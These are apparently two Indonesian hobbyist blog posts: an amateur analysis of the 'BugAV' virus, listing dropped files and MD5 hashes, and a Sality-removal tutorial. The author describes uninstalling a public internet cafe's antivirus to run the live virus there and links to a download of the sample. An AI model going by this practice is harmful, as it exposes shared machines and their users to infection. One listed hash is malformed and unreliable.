Pertama kali dihidupkan tidak terjadi apa-apa. Pada taskmanager tidak ada process yang mencurigakan. Bahkan process BugAV juga gak ada….

Regedit OK. Yah memang gak ada perubahan registry kata si penulis virus.

Analisis dilanjutkan. Ternyata virus ini dipack! Menurutku packer yang digunakan adalah UPX!

Analisis yang kulakukan di komputerku sia-sia. Tidak ada hasil.

Komputer III: (Komputer Warnet)
Sore harinya, aku pergi ke warnet yang lain. Di situ aku menjalankan virus ini. Begitu saya masukkan flashdisk, gak beberapa lama kemudian Kasp*rsky (antivirus yang terinstal di komputer warnet) mendeteksi virus BugAV.

Antivirus Kasp*rsky menyebutnya Packed with UPX.

Setelah lama berusaha untuk meng-uninstal Kasp*rsky, akhirnya saya bisa menjalankan virus BugAV tanpa halangan. Itu pun setelah didownload lagi.

Analisis di komputer III ini cukup memuaskan.
Virus ini ternyata membuat file berikut:

C:\Documents and Settings\Blue-Net\Local Settings\Temp\BugAV
Size: 1 bytes

C:\Documents and Settings\Blue-Net\Start Menu\Programs\Startup\?.exe
Size: 0 bytes

C:\RECYCLER\BugAV
Size: 1 bytes

Setelah di cek di taskmanager ada satu process yang namanya BugAV.exe.
Dan menurut saya, sepertinya ada process yang tersembunyi!

Akhir Analisis:
Saya sudah mendapatkan checksum dari ketiga file di atas dan file BugAV.exe juga. Bahkan checksum MD5nya juga sudah saya peroleh:
Neh checksum MD5-nya:

F5A7E477CD3042B49A9085D62307CD2 (C:\Documents and Settings\Blue-Net\Local Settings\Temp\BugAV)
D41D8CD98F00B204E9800998ECF8427E (C:\Documents and Settings\Blue-Net\Start Menu\Programs\Startup\?.exe)
7BC72A0767D237BE4DA30ACE191ACDC2 (C:\RECYCLER\BugAV)
6DE46E9D662EB0B8808324F5683266EA (File BugAV.exe)

Sementara checksum untuk Morphost, sudah saya simpan. Dan checksum tersebut tidak ditampilkan disini karena saya rasa hal itu gak perlu dilakukan.

Checksum yang Morphost gunakan lebih canggih dari checksum biasa seperti MD5 ataupun CRC32.
Rencananya saya akan lakukan lagi (maksudnya akan saya hidupkan lagi virus itu di computer yang berbeda).
Apabila file-file yang tercipta nantinya memiliki checksum Morphost yang sama dengan checksum yang sudah saya peroleh sebelumnya, maka kesimpulannya virus ini bisa dideteksi dengan Morphost Antivirus.

untuk sampel virusnya bisa didownload di MorphostLab.
atau Klik Disini

By:Morphic
http://www.morphostlab.co.nr

Thanks to:
-Kepomponk (saya jadi dapat pengalaman baru)
-A.M.Hirin (thanks karena udah nerima aku jadi anggota RFA)
-Anharku (tetap maju)
-FooBoyz (kapan sms-an lagi)
-MorphostLab
-Codenesia

Tuntaskan Sality!!!

Sebetulnya dulu aku pengen nulis artikel ini, tapi entah kenapa gak pernah sempat. He hehe. Untungnya sekarang aku sempat nulisnya.

Pernah nyoba Sality remover produk AVG??? Dulu aku juga pernah make itu tapi Salitynya gak hilang… mungkin varian baru jadi gak bisa dibersihin ama AVG kali?

Tapi program yang satu ini udah kucoba dan terbukti tuntas! Nama programnya Sality_off. Buatan Boris Yampolsky dari KasperskyLab.
Penggunaannya mudah kok. Tinggal klik dua kali aja, programnya langsung bekerja…

Nih tampilannya.

Benar-benar ampuh…

Kalo komputer kamu lagi kena sality, ikuti langkah berikut.
1. Hidupkan program Sality_Off.exe
2. Tunggu hingga program Sality_off selesai memeriksa komputermu. Pokoknya sampe muncul tulisan ”press any key to continue…”
3. terus hidupkan morphost, lalu buka registrytweakernya… Pilih Simple Tweaker

4. Beri tanda centang semuanya dan klik tombol ”Done”
Yah mungkin itulah solusi untuk sality versi Morphic. Program Sality_off bisa kamu dapatkan dengan googling dari satu web ke web lain atau dari satu blog ke blog lain.
Atau gak perlu jauh-jauh, di blog MorphostLab juga udah disediakan kok. Jadi kamu tinggal download aja.

KLik disini

Sebenarnya ada versi lengkapnya untuk menuntaskan sality ini, tapi saya rasa dengan cara saya ini juga sudah cukup kok.

Sekian tutorialnya,,,

By:Morphic
Thanks to: all readers and MorphostLab visitors.